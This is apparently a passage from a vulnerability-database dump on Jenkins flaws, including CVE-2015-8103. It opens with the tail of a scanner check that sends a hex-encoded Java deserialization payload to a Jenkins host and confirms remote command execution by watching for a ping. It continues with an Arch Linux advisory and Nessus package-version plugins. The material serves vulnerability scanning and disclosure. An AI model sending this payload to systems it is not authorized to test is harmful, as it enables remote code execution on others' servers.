0x6d,0x6f,0x74,0x65,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x2e,0x6a,0x61,0x76,0x61,0x71,0x00,0x7e,0x00,0x17,0x73,0x71,0x00,0x7e,\n 0x00,0x13,0x00,0x00,0x00,0xf6,0x74,0x00,0x27,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x52,0x65,0x6d,0x6f,0x74,0x65,0x49,0x6e,0x76,0x6f,\n 0x63,0x61,0x74,0x69,0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x71,0x00,0x7e,0x00,0x1e,0x74,0x00,0x06,0x69,0x6e,0x76,0x6f,0x6b,0x65,0x73,0x71,0x00,0x7e,0x00,0x13,0xff,0xff,\n 0xff,0xff,0x74,0x00,0x17,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x24,0x50,0x72,0x6f,0x78,0x79,0x31,0x70,0x74,0x00,0x0f,0x77,0x61,0x69,\n 0x74,0x46,0x6f,0x72,0x50,0x72,0x6f,0x70,0x65,0x72,0x74,0x79,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x04,0xe7,0x74,0x00,0x17,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,\n 0x6f,0x74,0x69,0x6e,0x67,0x2e,0x43,0x68,0x61,0x6e,0x6e,0x65,0x6c,0x74,0x00,0x0c,0x43,0x68,0x61,0x6e,0x6e,0x65,0x6c,0x2e,0x6a,0x61,0x76,0x61,0x74,0x00,0x15,0x77,0x61,0x69,0x74,\n 0x46,0x6f,0x72,0x52,0x65,0x6d,0x6f,0x74,0x65,0x50,0x72,0x6f,0x70,0x65,0x72,0x74,0x79,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x00,0x93,0x74,0x00,0x0e,0x68,0x75,0x64,0x73,0x6f,\n 0x6e,0x2e,0x63,0x6c,0x69,0x2e,0x43,0x4c,0x49,0x74,0x00,0x08,0x43,0x4c,0x49,0x2e,0x6a,0x61,0x76,0x61,0x71,0x00,0x7e,0x00,0x17,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x00,0x48,\n 0x74,0x00,0x1f,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x63,0x6c,0x69,0x2e,0x43,0x4c,0x49,0x43,0x6f,0x6e,0x6e,0x65,0x63,0x74,0x69,0x6f,0x6e,0x46,0x61,0x63,0x74,0x6f,0x72,0x79,0x74,\n 0x00,0x19,0x43,0x4c,0x49,0x43,0x6f,0x6e,0x6e,0x65,0x63,0x74,0x69,0x6f,0x6e,0x46,0x61,0x63,0x74,0x6f,0x72,0x79,0x2e,0x6a,0x61,0x76,0x61,0x74,0x00,0x07,0x63,0x6f,0x6e,0x6e,0x65,\n 0x63,0x74,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x01,0xdf,0x71,0x00,0x7e,0x00,0x2a,0x71,0x00,0x7e,0x00,0x2b,0x74,0x00,0x05,0x5f,0x6d,0x61,0x69,0x6e,0x73,0x71,0x00,0x7e,0x00,\n 0x13,0x00,0x00,0x01,0x86,0x71,0x00,0x7e,0x00,0x2a,0x71,0x00,0x7e,0x00,0x2b,0x74,0x00,0x04,0x6d,0x61,0x69,0x6e,0x73,0x72,0x00,0x26,0x6a,0x61,0x76,0x61,0x2e,0x75,0x74,0x69,0x6c,\n 0x2e,0x43,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,0x73,0x24,0x55,0x6e,0x6d,0x6f,0x64,0x69,0x66,0x69,0x61,0x62,0x6c,0x65,0x4c,0x69,0x73,0x74,0xfc,0x0f,0x25,0x31,0xb5,0xec,\n 0x8e,0x10,0x02,0x00,0x01,0x4c,0x00,0x04,0x6c,0x69,0x73,0x74,0x71,0x00,0x7e,0x00,0x0f,0x77,0x04,0xff,0xff,0xff,0xfd,0x78,0x72,0x00,0x2c,0x6a,0x61,0x76,0x61,0x2e,0x75,0x74,0x69,\n 0x6c,0x2e,0x43,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,0x73,0x24,0x55,0x6e,0x6d,0x6f,0x64,0x69,0x66,0x69,0x61,0x62,0x6c,0x65,0x43,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,0x6f,\n 0x6e,0x19,0x42,0x00,0x80,0xcb,0x5e,0xf7,0x1e,0x02,0x00,0x01,0x4c,0x00,0x01,0x63,0x74,0x00,0x16,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x75,0x74,0x69,0x6c,0x2f,0x43,0x6f,0x6c,0x6c,0x65,\n 0x63,0x74,0x69,0x6f,0x6e,0x3b,0x77,0x04,0xff,0xff,0xff,0xfd,0x78,0x70,0x73,0x72,0x00,0x13,0x6a,0x61,0x76,0x61,0x2e,0x75,0x74,0x69,0x6c,0x2e,0x41,0x72,0x72,0x61,0x79,0x4c,0x69,\n 0x73,0x74,0x78,0x81,0xd2,0x1d,0x99,0xc7,0x61,0x9d,0x03,0x00,0x01,0x49,0x00,0x04,0x73,0x69,0x7a,0x65,0x77,0x04,0xff,0xff,0xff,0xfd,0x78,0x70,0x00,0x00,0x00,0x00,0x77,0x04,0x00,\n 0x00,0x00,0x00,0x78,0x71,0x00,0x7e,0x00,0x39,0x78,0x71,0x00,0x7e,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x00,0x00,0x01,0x75,0x72,0x00,0x13,0x5b,0x4c,0x6a,\n 0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,0x90,0xce,0x58,0x9f,0x10,0x73,0x29,0x6c,0x02,0x00,0x00,0x77,0x04,0xff,0xff,0xff,0xfd,0x78,0x70,\n 0x00,0x00,0x00,0x01,0x74,0x00,0x18,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x63,0x6c,0x69,0x2e,0x43,0x6c,0x69,0x45,0x6e,0x74,0x72,0x79,0x50,0x6f,0x69,0x6e,0x74,0x71,0x00,0x7e,0x00,\n 0x24,0x75,0x72,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,0xad,0xd2,0x56,0xe7,0xe9,0x1d,0x7b,0x47,0x02,0x00,0x00,\n 0x77,0x04,0xff,0xff,0xff,0xfd,0x78,0x70,0x00,0x00,0x00,0x01,0x74,0x00,0x10,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x74,0x00,0x1d,0x52,\n 0x50,0x43,0x52,0x65,0x71,0x75,0x65,0x73,0x74,0x28,0x31,0x2c,0x77,0x61,0x69,0x74,0x46,0x6f,0x72,0x50,0x72,0x6f,0x70,0x65,0x72,0x74,0x79,0x29);\n\nsend( socket:soc, data:payload );\n\nfor( i = 0; i < 3; i++ )\n{\n res = send_capture( socket:soc,\n data:\"\",\n timeout:2,\n pcap_filter: string( \"icmp and icmp[0] = 8 and dst host \", this_host(), \" and src host \", get_host_ip() ) );\n\n if( res && ( win || vtcheck >< res ) )\n {\n close( soc );\n report = 'By sending a special crafted serialized stream it was possible to execute `' + cmd + '` on the remote host\\nReceived answer:\\n\\n' + hexdump(ddata:( res ) );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nif( soc ) close( soc );\n\nexit( 0 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:40", "bulletinFamily": "unix", "description": "- CVE-2015-5317 (information leakage)\n\nThe Jenkins UI allowed users to see the names of jobs and builds\notherwise inaccessible to them on the "Fingerprints" pages if those\nshared file fingerprints with fingerprinted files in accessible jobs.\n\n- CVE-2015-5318 (cross-side request forgery)\n\nThe salt used to generate the CSRF protection tokens was a publicly\naccessible value, allowing malicious users to circumvent CSRF protection\nby generating the correct token.\n\n- CVE-2015-5319 (XML external entity injection)\n\nWhen creating a job using the create-job CLI command, external entities\nare not discarded (nor processed). If these job configurations are\nprocessed by another user with an XML-aware tool (e.g. using\nget-job/update-job), information from that user's computer may be\ndisclosed to Jenkins and the attacker.\n\n- CVE-2015-5320 (access restriction bypass)\n\nJNLP slave connections did not verify that the correct secret was\nsupplied, which allowed malicious users to connect their own machines as\nslaves to Jenkins knowing only the name of the slave. This enables\nattackers to take over Jenkins (unless the slave-to-master security\nsubsystem is enabled) or gain access to private data like keys and\nsource code.\n\n- CVE-2015-5321 (information leakage)\n\nThe CLI command overview and help pages in Jenkins were accessible\nwithout Overall/Read permission, resulting in disclosure of the names of\nconfigured slaves (and contents of other sidepanel widgets, if present)\nto unauthorized users.\n\n- CVE-2015-5322 (directory traversal)\n\nAccess to the /jnlpJars/ URL was not limited to the specific JAR files\nusers needed to access, allowing browsing directories and downloading\nother files in the Jenkins servlet resources, such as web.xml.\n\n- CVE-2015-5323 (access restriction bypass)\n\nAPI tokens of other users were exposed to admins by default. On\ninstances that don't implicitly grant RunScripts permission to admins,\nthis allowed admins to run scripts with another user's credentials.\n\n- CVE-2015-5324 (information leakage)\n\nThe /queue/api URL could return information about items not accessible\nto the current user (such as parameter names and values, build names,\nproject descriptions).\n\n- CVE-2015-5325 (access restriction bypass)\n\nSlaves connecting via JNLP were not subject to the optional\nslave-to-master access control documented at\n<A HREF=\"http://jenkins-ci.org/security-144\">http://jenkins-ci.org/security-144</A> (CVE-2014-3665).\n\n- CVE-2015-5326 (cross-side scripting)\n\nUsers with the permission to take slave nodes offline can enter\narbitrary HTML that gets shown unescaped to users visiting the slave\noverview page.\n\n- CVE-2015-8103 (arbitrary code execution)\n\nUnsafe deserialization allows unauthenticated remote attackers to run\narbitrary code on the Jenkins master.", "modified": "2015-11-18T00:00:00", "published": "2015-11-18T00:00:00", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-November/000439.html", "id": "ASA-201511-11", "title": "jenkins: multiple issues", "type": "archlinux", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-11-01T02:27:25", "bulletinFamily": "scanner", "description": "Update to 1.625.2 - Resolves: CVE-2015-5317, CVE-2015-5318,\nCVE-2015-5319, CVE-2015-5320, CVE-2015-5324, CVE-2015-5321,\nCVE-2015-5322, CVE-2015-5323, CVE-2015-5325, CVE-2015-5326,\nSECURITY-218\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2015-D02FEEBD15.NASL", "href": "https://www.tenable.com/plugins/nessus/89418", "published": "2016-03-04T00:00:00", "title": "Fedora 23 : jenkins-1.625.2-2.fc23 / jenkins-remoting-2.53-1.fc23 (2015-d02feebd15)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-d02feebd15.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(89418);\n script_version(\"$Revision: 1.1 $\");\n script_cvs_date(\"$Date: 2016/03/04 16:10:31 $\");\n\n script_xref(name:\"FEDORA\", value:\"2015-d02feebd15\");\n\n script_name(english:\"Fedora 23 : jenkins-1.625.2-2.fc23 / jenkins-remoting-2.53-1.fc23 (2015-d02feebd15)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 1.625.2 - Resolves: CVE-2015-5317, CVE-2015-5318,\nCVE-2015-5319, CVE-2015-5320, CVE-2015-5324, CVE-2015-5321,\nCVE-2015-5322, CVE-2015-5323, CVE-2015-5325, CVE-2015-5326,\nSECURITY-218\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-November/172425.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ad29bec3\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-November/172428.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c6577858\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jenkins and / or jenkins-remoting packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jenkins-remoting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"jenkins-1.625.2-2.fc23\")) flag++;\nif (rpm_check(release:\"FC23\", reference:\"jenkins-remoting-2.53-1.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jenkins / jenkins-remoting\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T03:21:06", "bulletinFamily": "scanner", "description": "Red Hat OpenShift Enterprise release 2.2.9, which fixes several\nsecurity issues, several bugs, and introduces feature enhancements, is\nnow available.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nOpenShift Enterprise by Red Hat is the company", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2016-0489.NASL", "href": "https://www.tenable.com/plugins/nessus/119368", "published": "2018-12-04T00:00:00", "title": "RHEL 6 : Red Hat OpenShift Enterprise 2.2.9 (RHSA-2016:0489)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0489. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119368);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/10/24 15:35:41\");\n\n script_cve_id(\"CVE-2015-5254\", \"CVE-2015-5317\", \"CVE-2015-5318\", \"CVE-2015-5319\", \"CVE-2015-5320\", \"CVE-2015-5321\", \"CVE-2015-5322\", \"CVE-2015-5323\", \"CVE-2015-5324\", \"CVE-2015-5325\", \"CVE-2015-5326\", \"CVE-2015-7537\", \"CVE-2015-7538\", \"CVE-2015-7539\", \"CVE-2015-8103\");\n script_xref(name:\"RHSA\", value:\"2016:0489\");\n\n script_name(english:\"RHEL 6 : Red Hat OpenShift Enterprise 2.2.9 (RHSA-2016:0489)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Red Hat OpenShift Enterprise release 2.2.9, which fixes several\nsecurity issues, several bugs, and introduces feature enhancements, is\nnow available.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nOpenShift Enterprise by Red Hat is the company's cloud computing\nPlatform-as-a-Service (PaaS) solution designed for on-premise or\nprivate cloud deployments.\n\nThe following security issue is addressed with this release :\n\nIt was found that ActiveMQ did not safely handle user-supplied data\nwhen deserializing objects. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the ActiveMQ\napplication. (CVE-2015-5254)\n\nAn update for Jenkins Continuous Integration Server that addresses a\nlarge number of security issues including XSS, CSRF, information\ndisclosure and code execution have been addressed as well.\n(CVE-2015-5317, CVE-2015-5318, CVE-2015-5319, CVE-2015-5320,\nCVE-2015-5321, CVE-2015-5322, CVE-2015-5323, CVE-2015-5324,\nCVE-2015-5325, CVE-2015-5326, CVE-2015-7537, CVE-2015-7538,\nCVE-2015-7539, CVE-2015-8103)\n\nSpace precludes documenting all of the bug fixes in this advisory. See\nthe OpenShift Enterprise Technical Notes, which will be updated\nshortly for release 2.2.9, for details about these changes :\n\nhttps://access.redhat.com/documentation/en-US/OpenShift_Enterprise/2/\nhtml-single/Technical_Notes/index.html\n\nAll OpenShift Enterprise 2 users are advised to upgrade to these\nupdated packages.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:0489\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7538\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7539\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5318\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7537\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5320\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5317\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-8103\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5324\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5325\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5254\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5326\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5321\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5319\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5323\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5322\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'OpenNMS Java Object Unserialization Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:activemq-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-enterprise-release\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-enterprise-upgrade-node\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-enterprise-yum-validator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-origin-cartridge-cron\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-origin-cartridge-haproxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-origin-cartridge-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-origin-cartridge-php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-origin-cartridge-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-origin-msg-node-mcollective\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-origin-node-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-origin-node-util\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-openshift-origin-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-openshift-origin-frontend-apache-vhost\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-openshift-origin-node\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:0489\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL6\", rpm:\"openshift-origin\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"OpenShift\");\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"activemq-client-5.9.0-6.redhat.611454.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jenkins-1.625.3-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"openshift-enterprise-release-2.2.9-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"openshift-enterprise-upgrade-node-2.2.9-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"openshift-enterprise-yum-validator-2.2.9-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"openshift-origin-cartridge-cron-1.25.2.1-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"openshift-origin-cartridge-haproxy-1.31.5.1-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"openshift-origin-cartridge-mysql-1.31.2.1-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"openshift-origin-cartridge-php-1.35.3.1-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"openshift-origin-cartridge-python-1.34.2.1-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"openshift-origin-msg-node-mcollective-1.30.2.1-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"openshift-origin-node-proxy-1.26.2.1-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"openshift-origin-node-util-1.38.6.2-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-bcmath-5.3.3-46.el6_7.1\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-debuginfo-5.3.3-46.el6_7.1\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-devel-5.3.3-46.el6_7.1\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-fpm-5.3.3-46.el6_7.1\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-imap-5.3.3-46.el6_7.1\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-intl-5.3.3-46.el6_7.1\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", 